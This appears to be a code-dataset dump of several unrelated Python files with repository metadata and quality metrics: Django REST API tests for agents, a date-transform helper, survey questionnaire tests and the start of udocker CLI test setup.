users_list.append(user)
self.full_valid_agent['user'] = users_list[0].id
def test_list_agents(self):
response = self.client.get(f'{self.route}')
with self.subTest('Must return Unauthorized', response=response):
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
body = response.json()
self.assertIn('detail', body)
self.assertIn('authentication', body.get('detail').lower())
self.login(permission='delete')
response = self.client.get(f'{self.route}')
with self.subTest('Must return Forbidden', response=response):
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
body = response.json()
self.assertIn('detail', body)
self.assertIn('permission', body.get('detail').lower())
self.login(permission='view')
response = self.client.get(f'{self.route}')
with self.subTest('Must return data and a success code', response=response):
agents = response.json()
for i, agent in enumerate(agents):
expected_agent = self.agents_list[i]
self.assertEqual(expected_agent.name, agent.get('name'))
self.assertEqual(expected_agent.environment, agent.get('environment'))
self.assertEqual(expected_agent.user_id, agent.get('user'))
def test_create_agent(self):
response = self.client.post(f'{self.route}', data={}, format='json')
with self.subTest('Must return Unauthorized', response=response):
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
body = response.json()
self.assertIn('detail', body)
self.assertIn('authentication', body.get('detail').lower())
self.login(permission='delete')
response = self.client.post(f'{self.route}', data={}, format='json')
with self.subTest('Must return Forbidden', response=response):
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
body = response.json()
self.assertIn('detail', body)
self.assertIn('permission', body.get('detail').lower())
self.login(permission='add')
response = self.client.post(f'{self.route}', data={}, format='json')
with self.subTest('Name and environment must be required', response=response):
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
body = response.json()
self.assertIn('name', body)
self.assertIn('environment', body)
self.assertSubstringIn('required', body.get('name'))
self.assertSubstringIn('required', body.get('environment'))
response = self.client.post(f'{self.route}', data=self.invalid_agent, format='json')
with self.subTest('Name and environment must be valid', response=response):
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
body = response.json()
self.assertIn('name', body)
self.assertIn('environment', body)
self.assertSubstringIn('Ensure', body.get('name'))
self.assertSubstringIn('valid', body.get('environment'))
data = self.simple_valid_agent
response = self.client.post(f'{self.route}', data=data, format='json')
with self.subTest('Agent must be created with only required fields', response=response):
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
agent = response.json()
self.assertEqual(data.get('name'), agent.get('name'))
self.assertEqual(data.get('environment'), agent.get('environment'))
expected_agents = len(self.agents_list) + 1
db_agents = Agent.objects.count()
self.assertEqual(expected_agents, db_agents)
data = self.full_valid_agent
response = self.client.post(f'{self.route}', data=data, format='json')
with self.subTest('Agent must be created with all fields', response=response):
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
agent = response.json()
self.assertEqual(data.get('name'), agent.get('name'))
self.assertEqual(data.get('environment'), agent.get('environment'))
self.assertEqual(data.get('user'), agent.get('user'))
self.assertEqual(data.get('address'), agent.get('address'))
expected_agents = len(self.agents_list) + 2
db_agents = Agent.objects.count()
self.assertEqual(expected_agents, db_agents)
def test_list_one_agent(self):
pk = len(self.agents_list) + 2
response = self.client.get(f'{self.route}{pk}/')
with self.subTest('Must return Unauthorized', response=response):
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
body = response.json()
self.assertIn('detail', body)
self.assertIn('authentication', body.get('detail').lower())
self.login(permission='delete')
response = self.client.get(f'{self.route}{pk}/')
with self.subTest('Must return Forbidden', response=response):
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
body = response.json()
self.assertIn('detail', body)
self.assertIn('permission', body.get('detail').lower())
self.login(permission='view')
response = self.client.get(f'{self.route}{pk}/')
with self.subTest('List must return not found', response=response):
self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
self.assertIn('detail', response.json())
self.assertIn('not found', response.json().get('detail').lower())
pk = 2
response = self.client.get(f'{self.route}{pk}/')
with self.subTest('Must return the correct agent', response=response):
self.assertEqual(response.status_code, status.HTTP_200_OK)
agent = response.json()
expected_agent = self.agents_list[pk-1]
self.assertEqual(pk, agent.get('id'))
self.assertEqual(expected_agent.id, agent.get('id'))
self.assertEqual(expected_agent.name, agent.get('name'))
self.assertEqual(expected_agent.environment, agent.get('environment'))
def test_update_agent(self):
pk = len(self.agents_list) + 2
response = self.client.put(f'{self.route}{pk}/', data={}, format='json')
with self.subTest('Must return Unauthorized', response=response):
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
body = response.json()
self.assertIn('detail', body)
self.assertIn('authentication', body.get('detail').lower())
self.login(permission='delete')
response = self.client.put(f'{self.route}{pk}/', data={}, format='json')
with self.subTest('Must return Forbidden', response=response):
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
body = response.json()
self.assertIn('detail', body)
self.assertIn('permission', body.get('detail').lower())
self.login(permission='change')
response = self.client.put(f'{self.route}{pk}/', data={}, format='json')
with self.subTest('Update must return not found', response=response):
self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
self.assertIn('detail', response.json())
self.assertIn('not found', response.json().get('detail').lower())
pk = 2
response = self.client.put(f'{self.route}{pk}/', data={}, format='json')
with self.subTest('Name and environment must be required', response=response):
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
body = response.json()
self.assertIn('name', body)
self.assertIn('environment', body)
self.assertSubstringIn('required', body.get('name'))
self.assertSubstringIn('required', body.get('environment'))
data = self.invalid_agent
response = self.client.put(f'{self.route}{pk}/', data=data, format='json')
with self.subTest('Name and environment must be valid', response=response):
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
body = response.json()
self.assertIn('name', body)
self.assertIn('environment', body)
self.assertSubstringIn('Ensure', body.get('name'))
self.assertSubstringIn('valid', body.get('environment'))
data = self.full_valid_agent
response = self.client.put(f'{self.route}{pk}/', data=data, format='json')
with self.subTest('Agent must be updated', response=response):
self.assertEqual(response.status_code, status.HTTP_200_OK)
agent = response.json()
expected_agent = self.agents_list[pk-1]
self.assertEqual(pk, agent.get('id'))
self.assertEqual(expected_agent.id, agent.get('id'))
self.assertEqual(data.get('name'), agent.get('name'))
self.assertEqual(data.get('environment'), agent.get('environment'))
self.assertEqual(data.get('user'), agent.get('user'))
self.assertEqual(data.get('address'), agent.get('address'))
self.assertNotEqual(expected_agent.name, agent.get('name'))
def test_partial_update_agent(self):
pk = len(self.agents_list) + 2
response = self.client.patch(f'{self.route}{pk}/', data={}, format='json')
with self.subTest('Must return Unauthorized', response=response):
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
body = response.json()
self.assertIn('detail', body)
self.assertIn('authentication', body.get('detail').lower())
self.login(permission='delete')
response = self.client.patch(f'{self.route}{pk}/', data={}, format='json')
with self.subTest('Must return Forbidden', response=response):
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
body = response.json()
self.assertIn('detail', body)
self.assertIn('permission', body.get('detail').lower())
self.login(permission='change')
response = self.client.patch(f'{self.route}{pk}/', data={}, format='json')
with self.subTest('Partial update must return not found', response=response):
self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
self.assertIn('detail', response.json())
self.assertIn('not found', response.json().get('detail').lower())
pk = 2
data = {'name': self.invalid_agent.get('name')}
response = self.client.patch(f'{self.route}{pk}/', data=data, format='json')
with self.subTest('Name must be valid', response=response):
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
body = response.json()
self.assertIn('name', body)
self.assertSubstringIn('Ensure', body.get('name'))
pk = 2
data = {'environment': self.invalid_agent.get('environment')}
response = self.client.patch(f'{self.route}{pk}/', data=data, format='json')
with self.subTest('Environment must be valid', response=response):
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
body = response.json()
self.assertIn('environment', body)
self.assertSubstringIn('valid', body.get('environment'))
pk = 2
data = {'address': 'invalid_address'}
response = self.client.patch(f'{self.route}{pk}/', data=data, format='json')
with self.subTest('Address must be valid', response=response):
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
body = response.json()
self.assertIn('address', body)
self.assertSubstringIn('valid', body.get('address'))
pk = 2
data = {'user': 20}
response = self.client.patch(f'{self.route}{pk}/', data=data, format='json')
with self.subTest('User must be valid', response=response):
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
body = response.json()
self.assertIn('user', body)
self.assertSubstringIn('valid', body.get('user'))
pk = 2
data = {'address': self.full_valid_agent.get('address')}
response = self.client.patch(f'{self.route}{pk}/', data=data, format='json')
with self.subTest('Agent must be partial updated', response=response):
self.assertEqual(response.status_code, status.HTTP_200_OK)
agent = response.json()
expected_agent = self.agents_list[pk-1]
self.assertEqual(pk, agent.get('id'))
self.assertEqual(expected_agent.id, agent.get('id'))
self.assertEqual(expected_agent.name, agent.get('name'))
self.assertEqual(expected_agent.environment, agent.get('environment'))
self.assertEqual(expected_agent.user.id, agent.get('user'))
self.assertEqual(data.get('address'), agent.get('address'))
self.assertNotEqual(expected_agent.address, agent.get('address'))
def test_delete_agent(self):
pk = len(self.agents_list) + 2
response = self.client.delete(f'{self.route}{pk}/')
with self.subTest('Must return Unauthorized', response=response):
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
body = response.json()
self.assertIn('detail', body)
self.assertIn('authentication', body.get('detail').lower())
self.login(permission='add')
response = self.client.delete(f'{self.route}{pk}/')
with self.subTest('Must return Forbidden', response=response):
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
body = response.json()
self.assertIn('detail', body)
self.assertIn('permission', body.get('detail').lower())
self.login(permission='delete')
response = self.client.delete(f'{self.route}{pk}/')
with self.subTest('Delete must return not found', response=response):
self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)
self.assertIn('detail', response.json())
self.assertIn('not found', response.json().get('detail').lower())
pk = 2
response = self.client.delete(f'{self.route}{pk}/')
with self.subTest('Agent must be deleted', response=response):
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
total_agents = len(self.agents_list) - 1
db_agents = Agent.objects.count()
self.assertEqual(total_agents, db_agents)
self.assertRaises(Agent.DoesNotExist, Agent.objects.get, pk=pk)
| 48.949555
| 96
| 0.629062
| 1,901
| 16,496
| 5.358759
| 0.066281
| 0.071856
| 0.054776
| 0.091293
| 0.876607
| 0.864435
| 0.8449
| 0.841563
| 0.835967
| 0.830176
| 0
| 0.009758
| 0.229692
| 16,496
| 336
| 97
| 49.095238
| 0.791926
| 0.001455
| 0
| 0.730769
| 0
| 0
| 0.158166
| 0
| 0
| 0
| 0
| 0
| 0.409091
| 1
| 0.024476
| false
| 0
| 0.013986
| 0
| 0.055944
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
34c16471451a4d334c70381e81d160e361e566dc
| 1,353
|
py
|
Python
|
djangae/db/backends/appengine/transforms.py
|
martinogden/djangae
|
22610a636556c98a68200ebbeb6f1f57da42d617
|
[
"BSD-3-Clause"
] | null | null | null |
djangae/db/backends/appengine/transforms.py
|
martinogden/djangae
|
22610a636556c98a68200ebbeb6f1f57da42d617
|
[
"BSD-3-Clause"
] | null | null | null |
djangae/db/backends/appengine/transforms.py
|
martinogden/djangae
|
22610a636556c98a68200ebbeb6f1f57da42d617
|
[
"BSD-3-Clause"
] | null | null | null |
import calendar
from datetime import date, datetime
def date_to_epoch(d):
return int(calendar.timegm(d.timetuple()) * 1000000)
def year_transform(connection, value):
value = connection.ops.value_from_db_date(value)
return date_to_epoch(date(value.year, 1, 1)) if value else None
def month_transform(connection, value):
value = connection.ops.value_from_db_date(value)
return date_to_epoch(date(value.year, value.month, 1)) if value else None
def day_transform(connection, value):
value = connection.ops.value_from_db_date(value)
return date_to_epoch(value) if value else None
def hour_transform(connection, value):
value = connection.ops.value_from_db_datetime(value)
return date_to_epoch(
datetime(
value.year, value.month, value.day,
value.hour, 1, 1
)
)
def minute_transform(connection, value):
value = connection.ops.value_from_db_datetime(value)
return date_to_epoch(
datetime(
value.year, value.month, value.day,
value.hour, value.minute, 1
)
)
def second_transform(connection, value):
value = connection.ops.value_from_db_datetime(value)
return date_to_epoch(
datetime(
value.year, value.month, value.day,
value.hour, value.minute, value.second
)
)
| 26.529412
| 77
| 0.684405
| 181
| 1,353
| 4.906077
| 0.160221
| 0.047297
| 0.086712
| 0.195946
| 0.813063
| 0.792793
| 0.75
| 0.75
| 0.75
| 0.75
| 0
| 0.012357
| 0.222469
| 1,353
| 51
| 78
| 26.529412
| 0.831749
| 0
| 0
| 0.405405
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.189189
| false
| 0
| 0.054054
| 0.027027
| 0.432432
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
550429fc8f8efa5c29aceb88787678ba9f1d8310
| 170
|
py
|
Python
|
setup_helpers/SiteToScrape.py
|
alyshakt/fountain-properties
|
fe22ebd8fbed703d647db06df5af4810d0047eab
|
[
"CC0-1.0"
] | null | null | null |
setup_helpers/SiteToScrape.py
|
alyshakt/fountain-properties
|
fe22ebd8fbed703d647db06df5af4810d0047eab
|
[
"CC0-1.0"
] | null | null | null |
setup_helpers/SiteToScrape.py
|
alyshakt/fountain-properties
|
fe22ebd8fbed703d647db06df5af4810d0047eab
|
[
"CC0-1.0"
] | null | null | null |
"""Search Engine enums o standardize the search engine input"""
import enum
class SiteToScrape(enum.Enum):
"""To standardize the search engine input"""
landwatch = 1
| 21.25
| 63
| 0.747059
| 23
| 170
| 5.521739
| 0.608696
| 0.283465
| 0.314961
| 0.409449
| 0.488189
| 0
| 0
| 0
| 0
| 0
| 0
| 0.006944
| 0.152941
| 170
| 7
| 64
| 24.285714
| 0.875
| 0.564706
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.333333
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
5511c754366264db6fd907f32c3aebc322536e17
| 15,217
|
py
|
Python
|
survey/tests/test_questionnaire.py
|
ONSdigital/alpha-eq-author
|
fe9f95695e88e9840d5cbf9e530286210adf0469
|
[
"MIT"
] | 1
|
2016-02-03T12:31:01.000Z
|
2016-02-03T12:31:01.000Z
|
survey/tests/test_questionnaire.py
|
ONSdigital/alpha-eq-author
|
fe9f95695e88e9840d5cbf9e530286210adf0469
|
[
"MIT"
] | null | null | null |
survey/tests/test_questionnaire.py
|
ONSdigital/alpha-eq-author
|
fe9f95695e88e9840d5cbf9e530286210adf0469
|
[
"MIT"
] | 1
|
2021-04-11T08:23:45.000Z
|
2021-04-11T08:23:45.000Z
|
import json
from django.core.urlresolvers import reverse
from django.test import TestCase
from survey.models import Survey, Questionnaire
from . import create_surveys, create_questionnaires, login
class QuestionnaireTestCase(TestCase):
@classmethod
def setUpTestData(cls):
cls.client = login(user="questionnaire-user", email="questionnaire-user@example.com", password="password")
f = open('survey/tests/resources/survey.json')
cls.contents = f.read()
def setUp(self):
create_surveys()
create_questionnaires()
def test_questionnaire(self):
questionnaire1 = Questionnaire.objects.get(questionnaire_id='1')
questionnaire2 = Questionnaire.objects.get(questionnaire_id='2')
self.assertEqual("Test Questionnaire 1", questionnaire1.title)
self.assertEqual("Test Questionnaire 2", questionnaire2.title)
self.assertEqual("questionnaire overview 1", questionnaire1.overview)
self.assertEqual("questionnaire overview 2", questionnaire2.overview)
self.assertEqual(Survey.objects.get(survey_id='1'), questionnaire1.survey)
self.assertEqual(Survey.objects.get(survey_id='2'), questionnaire2.survey)
self.assertFalse(questionnaire1.reviewed)
self.assertFalse(questionnaire2.reviewed)
def test_check_question_count(self):
response = QuestionnaireTestCase.client.get(reverse('survey:index'))
# check that survey one has a single questionnaire with id 1
survey = response.context['object_list'][0]
self.assertEqual(Survey.objects.get(survey_id='1'), survey)
questionnaire_set = survey.questionnaire_set.all()
self.assertEqual(len(questionnaire_set), 1)
self.assertEqual(Questionnaire.objects.get(questionnaire_id='1'), questionnaire_set[0])
# check that survey two has a single questionnaire with id 2
survey = response.context['object_list'][1]
self.assertEqual(Survey.objects.get(survey_id='2'), survey)
questionnaire_set = survey.questionnaire_set.all()
self.assertEqual(len(questionnaire_set), 1)
self.assertEqual(Questionnaire.objects.get(questionnaire_id='2'), questionnaire_set[0])
def test_add_questionnaire(self):
# add a new questionnaire to survey 1
response = QuestionnaireTestCase.client.post(reverse("survey:create-questionnaire", kwargs={'survey_slug': '1'}), {'title' : 'Test Questionnaire 3', 'questionnaire_id': '3', 'overview': 'questionnaire overview 3'}, follow=True)
self.assertEqual(200, response.status_code)
# now check that survey 1 has two questionnaires
response = QuestionnaireTestCase.client.get(reverse('survey:index'))
survey = response.context['object_list'][0]
self.assertEqual(Survey.objects.get(survey_id='1'), survey)
questionnaire_set = survey.questionnaire_set.all()
self.assertEqual(len(questionnaire_set), 2)
self.assertEqual(Questionnaire.objects.get(questionnaire_id='3'), questionnaire_set[0])
self.assertEqual(Questionnaire.objects.get(questionnaire_id='1'), questionnaire_set[1])
def test_add_questionnaire_fails_when_overview_is_missing(self):
# attempt to add an invalid questionnaire (i.e. missing the overview field)
response = QuestionnaireTestCase.client.post(reverse("survey:create-questionnaire", kwargs={'survey_slug': '1'}), {'title': 'Test Questionnaire 4', 'questionnaire_id': '4'}, follow=True)
self.assertContains(response, "This field is required")
def test_add_questionnaire_fails_when_title_is_missing(self):
# attempt to add an invalid questionnaire (i.e. missing the overview field)
response = QuestionnaireTestCase.client.post(reverse("survey:create-questionnaire", kwargs={'survey_slug': '1'}), {'questionnaire_id': '4', 'overview': 'questionnaire overview 4'}, follow=True)
self.assertContains(response, "This field is required")
def test_add_questionnaire_fails_when_id_is_missing(self):
# attempt to add an invalid questionnaire (i.e. missing the overview field)
response = QuestionnaireTestCase.client.post(reverse("survey:create-questionnaire", kwargs={'survey_slug': '1'}), {'title': 'Test Questionnaire 4', 'overview': 'questionnaire overview 4'}, follow=True)
self.assertContains(response, "This field is required")
def test_reviewed(self):
# add a new questionnaire to survey 1
response = QuestionnaireTestCase.client.post(reverse("survey:create-questionnaire", kwargs={'survey_slug': '1'}), {'title' : 'Test Questionnaire 3', 'questionnaire_id': '3', 'overview': 'questionnaire overview 3'}, follow=True)
self.assertEqual(200, response.status_code)
# now check that survey 1 has two questionnaires and the reviewed state is correct
response = QuestionnaireTestCase.client.get(reverse('survey:index'))
survey = response.context['object_list'][0]
self.assertEqual(Survey.objects.get(survey_id='1'), survey)
questionnaire_set = survey.questionnaire_set.all()
self.assertEqual(len(questionnaire_set), 2)
self.assertEqual(Questionnaire.objects.get(questionnaire_id='3'), questionnaire_set[0])
self.assertEqual(Questionnaire.objects.get(questionnaire_id='1'), questionnaire_set[1])
self.assertFalse(questionnaire_set[0].reviewed)
self.assertFalse(questionnaire_set[1].reviewed)
questionnaire = Questionnaire.objects.get(questionnaire_id=1)
response = QuestionnaireTestCase.client.get(reverse("survey:review-questionnaire", kwargs={'slug': questionnaire.id}), follow=True, HTTP_REFERER=reverse('survey:index'))
questionnaire = Questionnaire.objects.get(questionnaire_id='1')
self.assertTrue(questionnaire.reviewed)
def test_reviewed_false_after_add_question(self):
# add a new questionnaire to survey 1
response = QuestionnaireTestCase.client.post(reverse("survey:create-questionnaire", kwargs={'survey_slug': '1'}), {'title' : 'Test Questionnaire 3', 'questionnaire_id': '3', 'overview': 'questionnaire overview 3'}, follow=True)
self.assertEqual(200, response.status_code)
questionnaire = Questionnaire.objects.get(questionnaire_id=3)
response = QuestionnaireTestCase.client.get(reverse("survey:review-questionnaire", kwargs={'slug': questionnaire.id}), follow=True, HTTP_REFERER=reverse('survey:index'))
questionnaire = Questionnaire.objects.get(questionnaire_id='3')
self.assertTrue(questionnaire.reviewed)
# check the reviewed status is true
response = QuestionnaireTestCase.client.get(reverse('survey:index'))
survey = response.context['object_list'][0]
self.assertEqual(Survey.objects.get(survey_id='1'), survey)
questionnaire_set = survey.questionnaire_set.all()
self.assertTrue(questionnaire_set[0].reviewed)
# now add a question
response = QuestionnaireTestCase.client.post(reverse("survey:questionnaire-builder", kwargs={'pk': questionnaire.id}), QuestionnaireTestCase.contents, content_type='Application/JSON', follow=True, HTTP_X_REQUESTED_WITH='XMLHttpRequest')
self.assertEqual(200, response.status_code)
self.assertContains(response,"Your questionnaire has been saved")
# and check the reviewed status is false
response = QuestionnaireTestCase.client.get(reverse('survey:index'))
survey = response.context['object_list'][0]
self.assertEqual(Survey.objects.get(survey_id='1'), survey)
questionnaire_set = survey.questionnaire_set.all()
self.assertFalse(questionnaire_set[0].reviewed)
def test_published_a_questionnaire(self):
# add a new questionnaire to survey 1
response = QuestionnaireTestCase.client.post(reverse("survey:create-questionnaire", kwargs={'survey_slug': '1'}), {'title' : 'Test Questionnaire 3', 'questionnaire_id': '3', 'overview': 'questionnaire overview 3'}, follow=True)
self.assertEqual(200, response.status_code)
questionnaire = Questionnaire.objects.get(questionnaire_id=3)
# add a question to questionnaire
response = QuestionnaireTestCase.client.post(reverse("survey:questionnaire-builder", kwargs={'pk': questionnaire.id}), QuestionnaireTestCase.contents, content_type='Application/JSON', follow=True, HTTP_X_REQUESTED_WITH='XMLHttpRequest')
self.assertEqual(200, response.status_code)
self.assertContains(response,"Your questionnaire has been saved")
response = QuestionnaireTestCase.client.get(reverse("survey:questionnaire-summary", kwargs={'slug': questionnaire.id}),follow=True)
# check we cannot make it live
self.assertNotContains(response, 'publish')
response = QuestionnaireTestCase.client.get(reverse("survey:review-questionnaire", kwargs={'slug': questionnaire.id}), follow=True, HTTP_REFERER=reverse('survey:index'))
questionnaire = Questionnaire.objects.get(questionnaire_id='3')
self.assertTrue(questionnaire.reviewed)
# check we can publish
self.assertContains(response, 'publish')
response = QuestionnaireTestCase.client.get(reverse("survey:publish-questionnaire", kwargs={'slug' :questionnaire.id}), follow=True, HTTP_REFERER=reverse('survey:index'))
questionnaire = Questionnaire.objects.get(questionnaire_id='3')
self.assertTrue(questionnaire.published)
def test_locked_questionnaire(self):
# add a new questionnaire to survey 1
response = QuestionnaireTestCase.client.post(reverse("survey:create-questionnaire", kwargs={'survey_slug': '1'}), {'title' : 'Test Questionnaire 3', 'questionnaire_id': '3', 'overview': 'questionnaire overview 3'}, follow=True)
self.assertEqual(200, response.status_code)
questionnaire = Questionnaire.objects.get(questionnaire_id=3)
# lock the questionnaire
response = QuestionnaireTestCase.client.get(reverse("survey:questionnaire-builder", kwargs={'pk': questionnaire.id}), follow=True, HTTP_X_REQUESTED_WITH='XMLHttpRequest')
self.assertEqual(200, response.status_code)
# add a question to questionnaire
response = QuestionnaireTestCase.client.post(reverse("survey:questionnaire-builder", kwargs={'pk': questionnaire.id}), QuestionnaireTestCase.contents, content_type='Application/JSON', follow=True, HTTP_X_REQUESTED_WITH='XMLHttpRequest')
self.assertEqual(200, response.status_code)
self.assertContains(response,"Your questionnaire has been saved")
# log in as a new user
new_user = login(user="new-user", email="new-user@example.com", password="password")
# check we can't modify the questionnaire
response = new_user.post(reverse("survey:questionnaire-builder", kwargs={'pk': questionnaire.id}), QuestionnaireTestCase.contents, content_type='Application/JSON', follow=True, HTTP_X_REQUESTED_WITH='XMLHttpRequest')
self.assertEqual(200, response.status_code)
self.assertContains(response,"Locked for editing")
def test_unlocked_questionnaire(self):
# add a new questionnaire to survey 1
response = QuestionnaireTestCase.client.post(reverse("survey:create-questionnaire", kwargs={'survey_slug': '1'}), {'title' : 'Test Questionnaire 3', 'questionnaire_id': '3', 'overview': 'questionnaire overview 3'}, follow=True)
self.assertEqual(200, response.status_code)
questionnaire = Questionnaire.objects.get(questionnaire_id=3)
# lock the questionnaire
response = QuestionnaireTestCase.client.get(reverse("survey:questionnaire-builder", kwargs={'pk': questionnaire.id}), follow=True, HTTP_X_REQUESTED_WITH='XMLHttpRequest')
self.assertEqual(200, response.status_code)
# add a question to questionnaire
response = QuestionnaireTestCase.client.post(reverse("survey:questionnaire-builder", kwargs={'pk': questionnaire.id}), QuestionnaireTestCase.contents, content_type='Application/JSON', follow=True, HTTP_X_REQUESTED_WITH='XMLHttpRequest')
self.assertEqual(200, response.status_code)
self.assertContains(response, "Your questionnaire has been saved")
# log in as a new user
new_user = login(user="new-user", email="new-user@example.com", password="password")
# check we can't modify the questionnaire
response = new_user.post(reverse("survey:questionnaire-builder", kwargs={'pk': questionnaire.id}), QuestionnaireTestCase.contents, content_type='Application/JSON', follow=True, HTTP_X_REQUESTED_WITH='XMLHttpRequest')
self.assertEqual(200, response.status_code)
self.assertContains(response, "Locked for editing")
# unlock the questionnaire
response = QuestionnaireTestCase.client.post(reverse("survey:questionnaire-builder", kwargs={'pk': questionnaire.id}), '{"unlock":"true"}', content_type='Application/JSON', follow=True, HTTP_X_REQUESTED_WITH='XMLHttpRequest')
self.assertEqual(200, response.status_code)
self.assertContains(response, "Unlocked")
# check the new user can modify it now
response = new_user.post(reverse("survey:questionnaire-builder", kwargs={'pk': questionnaire.id}), QuestionnaireTestCase.contents, content_type='Application/JSON', follow=True, HTTP_X_REQUESTED_WITH='XMLHttpRequest')
self.assertEqual(200, response.status_code)
self.assertContains(response, "Your questionnaire has been saved")
def test_user_cannot_not_unlock_another_users_questionnaire(self):
# add a new questionnaire to survey 1
response = QuestionnaireTestCase.client.post(reverse("survey:create-questionnaire", kwargs={'survey_slug': '1'}), {'title' : 'Test Questionnaire 3', 'questionnaire_id': '3', 'overview': 'questionnaire overview 3'}, follow=True)
self.assertEqual(200, response.status_code)
questionnaire = Questionnaire.objects.get(questionnaire_id=3)
# lock the questionnaire
response = QuestionnaireTestCase.client.get(reverse("survey:questionnaire-builder", kwargs={'pk': questionnaire.id}), follow=True, HTTP_X_REQUESTED_WITH='XMLHttpRequest')
self.assertEqual(200, response.status_code)
# add a question to questionnaire
response = QuestionnaireTestCase.client.post(reverse("survey:questionnaire-builder", kwargs={'pk': questionnaire.id}), QuestionnaireTestCase.contents, content_type='Application/JSON', follow=True, HTTP_X_REQUESTED_WITH='XMLHttpRequest')
self.assertEqual(200, response.status_code)
self.assertContains(response, "Your questionnaire has been saved")
# log in as a new user
new_user = login(user="new-user", email="new-user@example.com", password="password")
# attempt to unlock the questionnaire
response = new_user.post(reverse("survey:questionnaire-builder", kwargs={'pk': questionnaire.id}), '{"unlock":"true"}', content_type='Application/JSON', follow=True, HTTP_X_REQUESTED_WITH='XMLHttpRequest')
self.assertEqual(200, response.status_code)
self.assertContains(response, "Locked for editing")
| 63.669456
| 245
| 0.727344
| 1,705
| 15,217
| 6.369501
| 0.081525
| 0.062155
| 0.093462
| 0.047882
| 0.87523
| 0.865378
| 0.839595
| 0.823665
| 0.805157
| 0.805157
| 0
| 0.013051
| 0.154038
| 15,217
| 238
| 246
| 63.936975
| 0.830576
| 0.085365
| 0
| 0.640523
| 0
| 0
| 0.201643
| 0.060154
| 0
| 0
| 0
| 0
| 0.437909
| 1
| 0.091503
| false
| 0.026144
| 0.03268
| 0
| 0.130719
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9b988eee400cff0f310fb82b6ff36ab9c9ff0a5d
| 58,168
|
py
|
Python
|
tests/unit/test_cli.py
|
kellrott/udocker
|
16a16de21a24f93a01331359b91884f406342737
|
[
"Apache-2.0"
] | 963
|
2016-05-31T12:20:14.000Z
|
2022-03-29T17:52:10.000Z
|
tests/unit/test_cli.py
|
ericcurtin/udocker
|
87fb41cb5bcdb211d70f2b7f067c8e33d8959a1f
|
[
"Apache-2.0"
] | 212
|
2016-07-11T10:45:14.000Z
|
2022-03-05T08:13:38.000Z
|
tests/unit/test_cli.py
|
ericcurtin/udocker
|
87fb41cb5bcdb211d70f2b7f067c8e33d8959a1f
|
[
"Apache-2.0"
] | 124
|
2016-07-22T06:32:37.000Z
|
2022-02-25T23:55:48.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
udocker unit tests: UdockerCLI
"""
from unittest import TestCase, main
from unittest.mock import Mock, patch
from udocker.config import Config
from udocker.cmdparser import CmdParser
from udocker.cli import UdockerCLI
BUILTIN = "builtins"
BOPEN = BUILTIN + '.open'
class UdockerCLITestCase(TestCase):
"""Test UdockerTestCase() command line interface."""
def setUp(self):
Config().getconf()
Config().conf['hostauth_list'] = ("/etc/passwd", "/etc/group")
Config().conf['cmd'] = "/bin/bash"
Config().conf['cpu_affinity_exec_tools'] = \
(["numactl", "-C", "%s", "--", ],
["taskset", "-c", "%s", ])
Config().conf['valid_host_env'] = "HOME"
Config().conf['username'] = "user"
Config().conf['userhome'] = "/"
Config().conf['oskernel'] = "4.8.13"
Config().conf['location'] = ""
Config().conf['keystore'] = "KEYSTORE"
str_local = 'udocker.container.localrepo.LocalRepository'
self.lrepo = patch(str_local)
self.local = self.lrepo.start()
self.mock_lrepo = Mock()
